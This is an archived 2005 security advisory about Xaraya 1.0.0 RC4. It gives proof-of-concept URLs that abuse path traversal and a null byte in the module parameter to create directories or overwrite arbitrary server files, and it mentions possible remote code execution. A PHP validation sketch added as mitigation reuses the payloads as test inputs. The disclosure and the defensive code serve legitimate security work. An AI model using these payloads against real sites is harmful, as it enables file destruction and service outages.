xarayaDOS.txt

2005-12-02T00:00:00
ID PACKETSTORM:42009
Type packetstorm
Reporter rgod
Modified 2005-12-02T00:00:00

Description

                                        
Xaraya <= 1.0.0 RC4 D.O.S / file corruption  
  
software:  
site: http://www.xaraya.com  
description: "Xaraya 1.0 Core is an Open Source web application framework  
written in PHP"  
  
vulnerable code in create() function in xarMLSXML2PHPBackend.php:  
  
  
  
i) you can create an empty dir; in some cases this leads to a D.O.S. condition. poc:  
  
http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php  
http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess  
  
  
  
  
ii) you can overwrite any file on the target system, using a null char  
  
example, D.O.S, overwriting a system file:  
  
http://[target]/[path_to_xaraya]/index.php?module=../../../../config.system.php%00  
  
this could even lead to a remote code execution condition, if a user overwrites  
some file where an inclusion path is defined  
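
A mitigation sketch for both cases above, added here as an example; it is not code from the advisory or from Xaraya. The function names and the use of the system temp dir as base directory are assumptions. It accepts the module parameter only as a plain identifier (no "..", no separators, no null char) and checks that the resulting path stays under the base directory before anything is created or written.

```php
<?php
// Added example: hypothetical helper names, not Xaraya's own code.

/** Accept only a plain module identifier: no separators, dots or NUL bytes. */
function is_valid_module_name(string $name): bool
{
    // \A and \z anchor the whole string; "$" alone would allow a trailing newline.
    return preg_match('/\A[A-Za-z][A-Za-z0-9_]{0,63}\z/', $name) === 1;
}

/**
 * Return the directory a create()-style routine may write to for $module,
 * or null when the name is rejected or the path would leave $baseDir.
 */
function module_dir(string $baseDir, string $module): ?string
{
    if (!is_valid_module_name($module)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $module;
    // If the path already exists, resolve symlinks and re-check containment.
    $resolved = file_exists($candidate) ? realpath($candidate) : $candidate;
    if ($resolved === false
        || strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $resolved;
}

// Constructed inputs; the last three mirror the module= values shown above.
$samples = [
    'articles',
    '../../../../.key.php',
    '../../../../../.htaccess',
    "../../../../config.system.php\0",
];
$base = sys_get_temp_dir(); // assumption: stands in for the real base dir
foreach ($samples as $s) {
    $dir = module_dir($base, $s);
    printf("%-42s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
        $dir === null ? 'rejected' : $dir);
}
```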
  
  
  
  
  
rgod  
site: http://rgod.altervista.org  
mail: retrogod at aliceposta it  
original advisory: http://rgod.altervista.org/xaraya1DOS.hmtl  